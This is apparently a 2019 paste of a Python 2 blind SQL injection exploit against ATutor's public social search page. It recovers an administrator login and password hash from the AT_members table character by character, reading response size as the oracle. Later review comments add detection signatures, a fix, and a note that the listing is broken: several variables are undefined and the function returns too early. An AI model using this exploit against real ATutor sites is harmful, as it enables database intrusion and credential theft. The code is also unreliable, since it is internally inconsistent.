
Untitled

a guest
Mar 25th, 2019
  # NOTE(review): the paste lost its indentation; the nesting below is a
  # reconstruction and must be confirmed against the author's file.
  def inject(r, inj, ip):
      """Probe a SQL sub-query one character at a time via ATutor's public social search.

      For every character position from 1 up to r - 1 a payload is built that
      compares ascii(substring((inj), position, 1)) with a candidate code.
      Candidate codes 32..125 are sent one GET request each, in the `q`
      parameter of index_public.php. A response whose Content-Length header
      is greater than 20 is read as "the comparison was true".

      Args:
          r: exclusive upper bound of the position loop. The name is rebound
              to the HTTP response object inside the loop.
          inj: text of the SQL sub-query; the caller writes spaces as /**/.
          ip: host name or address placed in the request URL.

      Review notes:
          As pasted, the listing is not self-consistent: `retrieved_value` is
          assigned only in a commented-out line, and neither `z` nor
          `searchFriends_sqli` is defined in the visible text. No import of
          `requests` or `sys` is visible either; they may sit outside the paste.

      Defender notes:
          In web-server logs this traffic shows up as a burst of near-identical
          GET requests (up to 94 per character position) to
          /ATutor/mods/_standard/social/index_public.php whose `q` value
          contains `/**/` and `ascii(substring(`. The durable fix is in the
          application: presumably `q` reaches a SQL statement by string
          concatenation and should be passed as a bound parameter instead.
      """
      extracted = ""
      for i in range(1, r):
          # %s receives the sub-query (with any "[CHAR]" in it replaced by the
          # position index), %d receives the position. The literal "[CHAR]" in
          # the template survives formatting and is filled with the candidate
          # code in the inner loop.
          injection_string = "test'/**/or/**/(ascii(substring((%s),%d,1)))=[CHAR]/**/or/**/1='" % (inj.replace("[CHAR]", str(i)),i)
          #retrieved_value = searchFriends_sqli(ip, injection_string)
          for j in range(32, 126):
              # now we update the sqli
              target = "http://%s/ATutor/mods/_standard/social/index_public.php?q=%s" % (ip, injection_string.replace("[CHAR]", str(j)))
              # Rebinds the parameter `r`; range(1, r) above was already
              # evaluated, so the loop bound is not affected.
              r = requests.get(target)
              # Debug output: dumps the headers of every response.
              print r.headers
              # Response size is the only signal used to tell true from false.
              content_length = int(r.headers['Content-Length'])
              if (content_length > 20):
                  # Returns the matching character code and leaves the
                  # function at the first hit.
                  return j
          # `retrieved_value` has no live assignment in the visible listing.
          if(retrieved_value):
              extracted += chr(retrieved_value)
              extracted_char = chr(retrieved_value)
              sys.stdout.write(extracted_char)
              sys.stdout.flush()
          else:
              print "\n(+) done!"
              break
      else:
          # presumably a for/else on the position loop - TODO confirm nesting
          return None
      # `z` is not defined anywhere in the visible listing.
      return z
  def main():
      """Command-line driver: takes one target host and runs two probes through inject().

      The first sub-query selects the `login` column of one AT_members row
      with status=3. The second selects the `password` column of the row whose
      login equals the value returned by the first probe; that value is
      interpolated into the second sub-query between single quotes. Both
      results are printed together at the end.

      Exits with status -1 after printing usage when the argument count is
      not exactly one.
      """
      args = sys.argv
      if len(args) != 2:
          print "(+) usage: %s <target>" % args[0]
          print '(+) eg: %s 192.168.121.103' % args[0]
          sys.exit(-1)

      host = args[1]

      # Probe 1: account name. Spaces are written as /**/ throughout.
      print "(+) Retrieving username...."
      login_query = 'select/**/login/**/from/**/AT_members/**/where/**/status=3/**/limit/**/1'
      login = inject(50, login_query, host)

      # Probe 2: stored password value for the account found above.
      print "(+) Retrieving password hash...."
      hash_template = 'select/**/password/**/from/**/AT_members/**/where/**/login/**/=/**/\'%s\''
      hash_query = hash_template % (login)
      pw_hash = inject(50, hash_query, host)

      print "(+) Credentials: %s / %s" % (login, pw_hash)
  # Run main() only when the file is executed as a script, not when imported.
  if __name__ == "__main__":
      main()